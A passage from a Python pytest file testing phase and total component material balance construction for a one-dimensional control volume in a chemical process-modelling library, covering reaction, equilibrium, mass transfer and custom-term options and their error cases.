assert isinstance(m.fs.cv.rate_reaction_stoichiometry_constraint,
Constraint)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns_no_ReactionBlock():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns_no_rxn_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.rp.del_component(m.fs.rp.rate_reaction_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_phase_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
mb = m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert isinstance(m.fs.cv.equilibrium_reaction_generation, Var)
assert isinstance(m.fs.cv.equilibrium_reaction_extent, Var)
assert isinstance(m.fs.cv.equilibrium_reaction_stoichiometry_constraint,
Constraint)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_not_active():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_no_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.rp.del_component(m.fs.rp.equilibrium_reaction_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_no_ReactionBlock():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert isinstance(m.fs.cv.phase_equilibrium_generation, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq_not_active():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq_no_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_phase_component_balances_mass_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances(has_mass_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert isinstance(m.fs.cv.mass_transfer_term, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]*units.mol/units.s/units.m
mb = m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_no_mw():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_mass_flow_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]*units.mol/units.s/units.m
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = Var(
m.fs.cv.properties[t, x].config.parameters.component_list,
units=units.kg/units.mol)
mb = m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_undefined_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]*units.kg/units.s/units.m
mb = m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_no_mw_comp():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 1
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_mole_flow_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]*units.kg/units.s/units.m
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = Var(
m.fs.cv.properties[t, x].config.parameters.component_list,
units=units.kg/units.mol)
mb = m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_mass_term_undefined_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.phase_list,
m.fs.pp.component_list)
def custom_method(t, x, p, j):
return m.fs.cv.test_var[t, p, j]
with pytest.raises(ConfigurationError):
m.fs.cv.add_phase_component_balances(custom_mass_term=custom_method)
# -----------------------------------------------------------------------------
# Test add_total_component_balances
@pytest.mark.unit
def test_add_total_component_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 2
for j in m.fs.pp.component_list:
with pytest.raises(KeyError):
assert m.fs.cv.material_balances[0, 0, j]
assert type(m.fs.cv.material_balances[0, 1, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_default_FFD():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 2
for j in m.fs.pp.component_list:
with pytest.raises(KeyError):
assert m.fs.cv.material_balances[0, 1, j]
assert type(m.fs.cv.material_balances[0, 0, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_distrubuted_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_dynamic():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"dynamic": True})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert isinstance(m.fs.cv.phase_fraction, Var)
assert isinstance(m.fs.cv.material_holdup, Var)
assert isinstance(m.fs.cv.material_accumulation, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances(has_rate_reactions=True)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert isinstance(m.fs.cv.rate_reaction_generation, Var)
assert isinstance(m.fs.cv.rate_reaction_extent, Var)
assert isinstance(m.fs.cv.rate_reaction_stoichiometry_constraint,
Constraint)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns_no_ReactionBlock():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_rate_rxns_no_rxn_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.rp.del_component(m.fs.rp.rate_reaction_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_total_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
mb = m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert isinstance(m.fs.cv.equilibrium_reaction_generation, Var)
assert isinstance(m.fs.cv.equilibrium_reaction_extent, Var)
assert isinstance(m.fs.cv.equilibrium_reaction_stoichiometry_constraint,
Constraint)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_not_active():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_no_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.rp.del_component(m.fs.rp.equilibrium_reaction_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_eq_rxns_no_ReactionBlock():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_total_component_balances_in_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
# Set property package to contain inherent reactions
m.fs.pp._has_inherent_reactions = True
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
mb = m.fs.cv.add_total_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert isinstance(m.fs.cv.inherent_reaction_generation, Var)
assert isinstance(m.fs.cv.inherent_reaction_extent, Var)
assert isinstance(m.fs.cv.inherent_reaction_stoichiometry_constraint,
Constraint)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_in_rxns_no_idx():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
# Set property package to contain inherent reactions
m.fs.pp._has_inherent_reactions = True
# delete inherent_Reaction_dix to trigger exception
m.fs.pp.del_component(m.fs.pp.inherent_reaction_idx)
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(PropertyNotSupportedError,
match="fs.cv Property package does not contain a "
"list of inherent reactions \(inherent_reaction_idx\), "
"but include_inherent_reactions is True."):
m.fs.cv.add_total_component_balances()
@pytest.mark.unit
def test_add_total_component_balances_phase_eq_not_active():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_total_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_total_component_balances_mass_transfer():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_total_component_balances(has_mass_transfer=True)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert isinstance(m.fs.cv.mass_transfer_term, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]*units.mol/units.s/units.m
mb = m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
assert isinstance(mb, Constraint)
assert len(mb) == 2
assert_units_consistent(m)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_no_mw():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
m.fs.pp.component_list)
def custom_method(t, x, j):
return m.fs.cv.test_var[t, j]
with pytest.raises(PropertyNotSupportedError):
m.fs.cv.add_total_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_total_component_balances_custom_molar_term_mass_flow_basis():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 2
